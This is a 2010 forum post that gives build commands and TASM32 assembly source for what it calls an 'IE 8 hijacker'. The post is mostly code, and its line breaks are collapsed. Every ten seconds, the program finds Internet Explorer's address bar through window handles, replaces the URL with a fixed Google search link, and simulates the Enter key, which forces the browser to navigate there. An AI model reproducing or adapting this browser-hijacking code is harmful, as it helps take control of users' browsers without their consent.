Posted July 26, 201015 yr plenty of examples of an IE 8 hijacker on the netheres one in tasm32;tasm32 /ml hijak;tlink32 -x -c -aa hijak,,,import32.386PLocalsjumps.Model Flat ,StdCallinclude windows.incextrn FindWindowExA:PROCextrn FindWindowA:PROCextrn SendMessageA:PROCextrn ExitProcess:PROCextrn MessageBoxA:PROCextrn SetForegroundWindow:PROCextrn keybd_event:PROCextrn Sleep:PROCVK_RETURN equ 0DhSW_SHOWNORMAL equ 1.data?buff db ?.datahwnd dd 0ieclass db "IEFrame",0ieworker db"WorkerW",0ieadd db "Address Combo Control",0ienav db "Navigation Bar",0ierebar db "ReBarWindow32",0iebar db "ToolBarWindow32",0ieedit db "Edit",0ieroot db"Address Band Root",0addrs db "http://www.google.com/search?hl=en&source=hp&q=&btnI=I%27m+Feeling+Lucky&aq=f&aqi=&aql=&oq=&gs_rfai=",0.codestart:loop:call Sleep,10000push 0push offset ieclasscall FindWindowAmov [hwnd],eaxpush 0push offset ieworkerpush 0push hwndcall FindWindowExAmov [hwnd],eaxpush 0push offset ierebarpush 0push hwndcall FindWindowExAmov [hwnd],eaxpush 0push offset ierootpush 0push hwndcall FindWindowExAmov [hwnd],eaxpush 0push offset ieeditpush 0push hwndcall FindWindowExAmov [hwnd],eaxpush offset buffpush 260push WM_GETTEXTpush hwndcall SendMessageA;push 0;push 0;push offset buff;push 0;call MessageBoxApush offset addrspush 0push WM_SETTEXTpush hwndcall SendMessageApush SW_SHOWNORMALpush [hwnd]call SetForegroundWindowpush 0 push 0push 0push VK_RETURNcall keybd_eventjmp loopcall ExitProcessend start Edited December 15, 201014 yr by JMC31337
Create an account or sign in to comment